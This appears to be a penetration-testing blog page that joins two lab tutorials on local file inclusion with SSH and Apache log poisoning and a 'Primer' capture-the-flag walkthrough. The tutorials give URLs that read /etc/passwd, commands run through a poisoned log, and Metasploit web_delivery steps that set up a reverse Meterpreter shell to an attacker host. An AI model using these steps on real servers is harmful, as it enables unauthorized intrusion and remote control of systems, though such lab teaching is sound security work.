RCE with LFI and SSH Log Poisoning

In this article you will learn how make unauthorized access in a web server if it is suffering from local file inclusion vulnerability with help of auth log file. To perform this attack Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)” that will help you in configuration of own web server as well as more about LFI vulnerability.

Attacker: Kali Linux

Target: Ubuntu

Let’s Begin!!

Create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC. Download File from Here

I had saved given below PHP code inside a text file as lfi.php and saved on desktop.

Now login with user as “root” and create a folder “lfi” inside /var/www/html

cd /var/www/html

mkdir lfi

Move lfi.php file from desktop to /var/www/html using given below command.

mv /home/raj/Desktop/lfi.php .

Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring following URL to read password files:

localhost/lfi/lfi.php?file=/etc/passwd

From given image you can observe that above URL has dumped following result shown below.

Open terminal in your kali Linux and connect the target through SSH service

ssh user@192.168.1.129

 From screenshot you can see I am connected with target system.

Type following command to view its logs:

tail -f /var/log/auth.log

 From given below image you can check the details of generated logs for auth.log file.

Now I will try to openauth.log.log file through lfi.php on browser therefore give read and write permission to auth.log.

cd /var/log/

chmod 775 auth.log

Now to include the auth.log file as file parameter and give following URL inside browser.

192.168.1.129/lfi/lfi.php?file=/var/log/auth.log

From given image you can see it is showing created auth logs in browser also. 

Since the auth.log file generates log for every success and failed login attempt when we try to connect with web server. Taking advantage of this feature now I will send malicious PHP code as fake user and it will get added automatically in auth.log file as new log.

ssh ‘’@192.168.1.129

Again when you will check its log, you will find the PHP code has been added as new log.

Type following command to view its logs:

tail -f /var/log/auth.log

Here it will dump the data of auth log as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/auth.log &c=ifconfig

If you found such kind of vulnerability in any web application then you can use metasploit platform to exploit web server.

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.1.123

msf exploit (web_delivery)>set srvport  8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1 of targeted web server.

msf exploit (web_delivery)>sessions 1

meterpreter> sysinfo

Hack the Primer VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as Primer. The credit for making this vm machine goes to “couchsofa” and it is another boot2root challenge where we have to root the VM to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.115 but you will have to find our own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.1.115

We found port 80 is open so we open this ip address in our browser.

We use dirb to list the directories and find robots.txt

dirb http://192.168.1.115/ -w

Inside the robots.txt we find a link to a page.

We open this link, it leads to page that has a story written on it.

We take a look at the source code at the and found another link.

When we open the link we found a link on the page.

When we open the link we are prompted for a password.

We capture the request of this page in burpsuite and and send it to repeater. In the response from the server, we find another link.

When we open the link we find another page that prompts for password.

Now we take a look at the url, it looks like md5 so we removed the first and underscore we find something interesting.

We find that the url are actually prime numbers converted into md5 hashes. We were at the 7 page, and the hash to that is 17. So we convert 19(next prime number) to md5 hash.

To open the it we add “8_” in front of the hash to complete the url. We open it in our browser and find a page.

We take a look at the source code and find another url.

We open it and find a custom made terminal that uses javascript to execute certain commands.

In the ~/usr/falken/ folder we find a hint, when we take a look at the processes we find a command that we need to run.

When we run connect falken@Erebus It prompts for password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth i 6^th august 1984. We use cupp to create a dictionary file.

We use burpsuite to bruteforce the password, we find that joshua1984 is the password.

When we login, we find a page again with terminal.

We check the files and find a few log files that are encoded. We use the decode command provided by the terminal to decode the files.

There we find our next clue, we googled trivial zero and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.

We use burpsuite to bruteforce the password and find it to be Riemann.

When we login we are again prompted with another terminal.

When we look through the files we find the md5 encoded string for the usernames. We check for processes and again find a command.

When we crack the md5 password, we find that these are password for the respective username.

When we login, we are again prompted with another terminal.

Looking through the files we find username, password and hostname.

We use these to login and find a page greeting us for completing challenge.

Log Poisoning through LFI

In this article we are demonstrating how a PHP file with include function can lead to LFI log injection attack in any web server. Please read our previous article “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)” that will help you in configuration of own web server as well as more about LFI vulnerability.

Attacker: Kali Linux

Target: ubuntu

Create a PHP file which will allow the user to include a file through file parameter. Hence using file parameter we can execute a file that contains malicious code to make unauthorized access is target PC. Download File from Here

Now I had saved given below PHP code inside a text file as lfi.php and saved on desktop.

Now login with user as “root” and create a folder “lfi” inside /var/www/html

cd /var/www/html

mkdir lfi

Move lfi.php file from desktop to /var/www/html using given below command.

mv /home/raj/Desktop/lfi.php .

Since we had added a php file with include function inside /var/www/html which allow to read the content of another file through it and can lead to LFI attack. Let’s demonstrate it by exploring following URL to read password files:

Localhost/lfi/lfi.php?file=/etc/passwd

From given image you can observe that above URL has dumped following result shown below.

Now I will try to open Apache access.log file through lfi.php on browser therefore give read permission to apache2 and then include the access.log file.

Now to include the acess.log file as file parameter and give following URL inside browser.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

From given image you can see it is showing created apache logs in browser. Now turn on burp suite to capture the request of same web page.

Here you will get intercepted data where we need to inject our cmd comment inside user-agent by replace highlighted data.

Add cmd comment  inside user_Agent and send the request with GET parameter  /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as shown in the below image. Then click on forward.

Here it will dump the log data as well as execute comment given through cmd. From screenshot you can view both log as well as process state.

In same manner execute ifconfig through cmd to verify network interface or can browse following url and view the result from inside the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig

If you found such kind of vulnerability in any web application then you can use metasploit platform to exploit web server.

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

 use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)> set lhost 192.168.0.104 

msf exploit (web_delivery)>set srvport  8081

msf exploit (web_delivery)>exploit

Copy the highlighted text shown in below window

 Paste the above copied malicious code inside URL as shown in given image and execute it as command.

When above code gets execute you will get meterpreter session 1.

msf exploit (web_delivery)>session –I 1

meterpreter> sysinfo